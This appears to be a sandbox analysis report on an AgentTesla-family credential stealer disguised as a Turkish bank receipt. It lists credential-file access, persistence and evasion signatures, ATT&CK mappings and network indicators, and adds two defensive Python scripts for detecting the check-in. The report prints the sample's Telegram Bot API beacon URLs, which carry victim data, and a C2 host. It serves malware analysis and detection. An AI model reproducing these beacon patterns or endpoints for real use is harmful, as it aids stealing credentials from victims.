                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match File source: 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: fahKSvwo.exe PID: 7696, type: MEMORYSTR
                Source: Yara match File source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\Desktop\e-dekont_html.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\e-dekont_html.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara match File source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.4158045385.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: fahKSvwo.exe PID: 7696, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match, File source: 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: fahKSvwo.exe PID: 7696, type: MEMORYSTR

Source: Yara match, File source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR
MITRE ATT&CK matrix, rebuilt per tactic from the flattened table. A number in square brackets is the signature-count marker the report shows for that cell; entries without a marker are the matrix's standard placeholder cells and carry no finding for this sample.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Native API [1], Scheduled Task/Job [1], At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading [1], Scheduled Task/Job [1], Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: DLL Side-Loading [1], Process Injection [111], Scheduled Task/Job [1], Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Disable or Modify Tools [11], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [3], Software Packing [12], DLL Side-Loading [1], Masquerading [1], Virtualization/Sandbox Evasion [31], Process Injection [111]
Credential Access: OS Credential Dumping [1], Input Capture [1], Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: File and Directory Discovery [1], System Information Discovery [13], Query Registry [1], Security Software Discovery [11], Process Discovery [1], Virtualization/Sandbox Evasion [31], Application Window Discovery [1], System Network Configuration Discovery [1]
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data [11], Data from Local System [1], Screen Capture [1], Email Collection [1], Input Capture [1], GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Web Service [1], Ingress Tool Transfer [3], Encrypted Channel [11], Non-Application Layer Protocol [3], Application Layer Protocol [14], Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Behavior Graph (ID 1559103; sample e-dekont_html.exe; start date 20/11/2024; architecture WINDOWS; score 100), rebuilt as a process tree from the flattened graph. Numbers in parentheses after a process name are the graph's created-files / created-registry-values counters; network entries are reproduced as the graph lists them (IP, then ports).

Start
  Contacted: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 13 other signatures
  +- e-dekont_html.exe (7)
  |    Dropped: C:\Users\user\AppData\Roaming\fahKSvwo.exe (PE32); C:\Users\...\fahKSvwo.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp7653.tmp (XML); C:\Users\user\...\e-dekont_html.exe.log (ASCII)
  |    Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  |    +- powershell.exe (23)
  |    |    Signatures: Loading BitLocker PowerShell Module
  |    |    +- conhost.exe
  |    |    +- WmiPrvSE.exe
  |    +- e-dekont_html.exe (15 2)
  |    |    Network: api.telegram.org 149.154.167.220, 443, 61282, 61290, TELEGRAMRU, United Kingdom; checkip.dyndns.com 193.122.130.0, 49733, 49738, 49740, ORACLE-BMC-31898US, United States; 2 other IPs or domains
  |    +- powershell.exe (23)
  |    |    +- conhost.exe
  |    +- schtasks.exe (1)
  |         +- conhost.exe
  +- fahKSvwo.exe (5)
       Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
       +- fahKSvwo.exe
       |    Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
       +- schtasks.exe
            +- conhost.exe

Antivirus and machine-learning detection (Source | Detection | Scanner | Label):

Submitted file
e-dekont_html.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
e-dekont_html.exe | 67% | Virustotal |
e-dekont_html.exe | 100% | Joe Sandbox ML |

Dropped file
C:\Users\user\AppData\Roaming\fahKSvwo.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\fahKSvwo.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\fahKSvwo.exe | 67% | Virustotal |

No Antivirus matches
No Antivirus matches
No Antivirus matches
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):

reallyfreegeoip.org | 188.114.97.3 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
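The domain table above is the network side of the sample's check-in: an external-IP lookup (checkip.dyndns.com / checkip.dyndns.org), a geolocation query (reallyfreegeoip.org), then a call to the Telegram Bot API (api.telegram.org). The following Python is an added example, not part of the Joe Sandbox report, that turns that sequence into a proxy-log correlation; the log format, the client names ws-17 / ws-03 / ws-22 and the timestamps are constructed for the demonstration, while the domain list is taken from the report's table.

```python
"""Correlate the three-step check-in recorded in the report's domain table.

Added example; not part of the Joe Sandbox report. Log format, client names
and timestamps are constructed. Domains come from the report's domain table.
"""
from datetime import datetime, timedelta

# Domains from the report, grouped by the role they play in the check-in.
IP_LOOKUP = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEO_LOOKUP = {"reallyfreegeoip.org"}
TELEGRAM_BOT = {"api.telegram.org"}

# Constructed proxy log: "<ISO time> <client> <destination host> <path>".
# ws-17 performs the full chain within seconds; ws-03 only talks to the
# Bot API (a legitimate bot client looks like this); ws-22 does the chain
# but its IP lookup is more than an hour before the beacon.
SAMPLE_LOG = """\
2024-11-20T16:24:31Z ws-17 checkip.dyndns.org /
2024-11-20T16:24:33Z ws-17 reallyfreegeoip.org /xml/8.46.123.75
2024-11-20T16:24:40Z ws-17 api.telegram.org /bot/sendMessage
2024-11-20T16:30:02Z ws-03 api.telegram.org /bot/getUpdates
2024-11-20T16:31:10Z ws-22 checkip.dyndns.com /
2024-11-20T17:40:00Z ws-22 reallyfreegeoip.org /xml/198.51.100.7
2024-11-20T17:43:06Z ws-22 api.telegram.org /bot/sendMessage
"""


def parse_log(text):
    """Parse the constructed log into (time, client, host, path) tuples."""
    events = []
    for line in text.splitlines():
        ts, client, host, path = line.split(" ", 3)
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, host, path))
    return events


def find_checkin_chains(events, window_seconds=300):
    """Return (client, beacon_time) for every Telegram Bot API call that is
    preceded, within window_seconds, by both an external-IP lookup and a
    geolocation lookup from the same client."""
    window = timedelta(seconds=window_seconds)
    by_client = {}
    for ev in sorted(events):
        by_client.setdefault(ev[1], []).append(ev)
    hits = []
    for client, evs in by_client.items():
        for i, (ts, _, host, path) in enumerate(evs):
            if host not in TELEGRAM_BOT or not path.startswith("/bot"):
                continue
            earlier = [e for e in evs[:i] if ts - e[0] <= window]
            saw_ip = any(e[2] in IP_LOOKUP for e in earlier)
            saw_geo = any(e[2] in GEO_LOOKUP for e in earlier)
            if saw_ip and saw_geo:
                hits.append((client, ts))
    return hits


if __name__ == "__main__":
    for client, ts in find_checkin_chains(parse_log(SAMPLE_LOG)):
        print("check-in chain from %s at %s" % (client, ts.isoformat()))
```

With the default five-minute window only ws-17 fires; widening the window to two hours also catches ws-22, and the lone Bot API client ws-03 never does. The window is the tuning knob: the report's own beacons are timestamped 16:24:40 and 17:43:06, so a host that repeats the chain roughly hourly is the pattern to look for.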
URLs contacted (Name | Malicious | Antivirus Detection | Reputation). Note that "false" and "high" here describe the reputation of the hosting domain (api.telegram.org and the geolocation services are legitimate services), not the use the sample makes of them; the Telegram requests are the beacons flagged elsewhere in this report as likely C&C.

http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
https://reallyfreegeoip.org/xml/8.46.123.75 | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
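The two Telegram URLs above are the sample's check-in beacon: a Bot API sendMessage call whose text parameter carries the victim's PC name, a timestamp and the country obtained from the geolocation lookup, followed by a bracketed status note. The following Python is an added example, not part of the Joe Sandbox report, that decodes those beacons into structured records for hunting; the two URLs are copied from the report as-is (the sandbox left the bot token and chat_id empty, so those fields decode as blank), and the field names of the returned record are this example's own choice.

```python
"""Decode the Telegram Bot API check-in beacons from the report's URL table.

Added example; not part of the Joe Sandbox report. The URLs are copied from
the report (token and chat_id are empty there). Record field names are mine.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed list holding the two beacon URLs copied from the report.
BEACONS = [
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D",
]

# Bot API paths are /bot<token>/<method>; the token slot is empty in the report.
BOT_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)$")


def is_telegram_bot_call(url):
    """True for any https request to api.telegram.org/bot<token>/<method>."""
    u = urlsplit(url)
    return (u.scheme == "https" and u.hostname == "api.telegram.org"
            and BOT_PATH.match(u.path) is not None)


def parse_beacon(url):
    """Split a sendMessage beacon into its fields.

    The text parameter is CRLF-separated "Key: value" lines followed by a
    bracketed status note; parse_qs already percent-decodes it for us.
    """
    u = urlsplit(url)
    m = BOT_PATH.match(u.path)
    if m is None:
        raise ValueError("not a Telegram Bot API call: %s" % url)
    qs = parse_qs(u.query, keep_blank_values=True)
    text = qs.get("text", [""])[0]
    fields = {}
    for line in text.split("\r\n"):
        line = line.strip()
        if line and not line.startswith("[") and ":" in line:
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    note = re.search(r"\[(.*?)\]", text, re.S)
    return {
        "method": m.group("method"),
        "token": m.group("token"),
        "chat_id": qs.get("chat_id", [""])[0],
        "pc_name": fields.get("PC Name", ""),
        "timestamp": fields.get("Date and Time", ""),
        "country": fields.get("Country Name", ""),
        "note": note.group(1).strip() if note else "",
    }


def summarize(urls):
    """One record per Bot API call; unrelated URLs are skipped."""
    return [parse_beacon(u) for u in urls if is_telegram_bot_call(u)]


if __name__ == "__main__":
    for rec in summarize(BEACONS):
        print(rec)
```

On a live capture the token field is what matters: it identifies the operator's bot and is the value to extract from memory or traffic for takedown and for matching other samples, whereas the PC name and timestamp only confirm which victim sent the beacon.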
URLs found in process memory and dropped files (Name | Source | Malicious | Reputation). The Antivirus Detection column is empty for every row and is omitted; trailing stray characters on some URLs are part of the extracted strings and are kept as the report shows them.

http://www.fontbureau.com/designersG | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.fontbureau.com/designers/? | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.founder.com.cn/cn/bThe | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot | e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.fontbureau.com/designers? | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.tiro.com | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20a | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.fontbureau.com/designers | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004014000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004137000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004061000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004647000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004571000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043F4000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004523000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000437F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.goodfont.co.kr | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://chrome.google.com/webstore?hl=en | fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003454000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resources | e-dekont_html.exe, fahKSvwo.exe.0.dr | false | high
http://varders.kozow.com:8081 | e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.sajatypeworks.com | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.typography.netD | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.founder.com.cn/cn/cThe | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.galapagosdesign.com/staff/dennis.htm | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://reallyfreegeoip.org/xml/8.46.123.75$ | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000331A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmp | false | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | e-dekont_html.exe, 00000008.00000002.4169157251.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.000000000401A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004112000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E4B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000435B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004622000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000452A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043D0000.00000004.00000800.00020000.00000000.sdmp | false | high
http://checkip.dyndns.org/q | e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp | false | high
http://www.galapagosdesign.com/DPlease | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.fonts.com | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.sandoll.co.kr | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.urwpp.deDPlease | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.zhongyicts.com.cn | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | e-dekont_html.exe, 00000000.00000002.1769422089.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 00000009.00000002.1839101508.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.sakkal.com | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000000.00000002.1776697265.0000000005D10000.00000004.00000020.00020000.00000000.sdmp | false | high
https://chrome.google.com/webstore?hl=enlBfq | e-dekont_html.exe, 00000008.00000002.4161363308.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000345E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://reallyfreegeoip.org/xml/ | e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032F0000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.office.com/ | fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003494000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.apache.org/licenses/LICENSE-2.0 | e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp | false | high
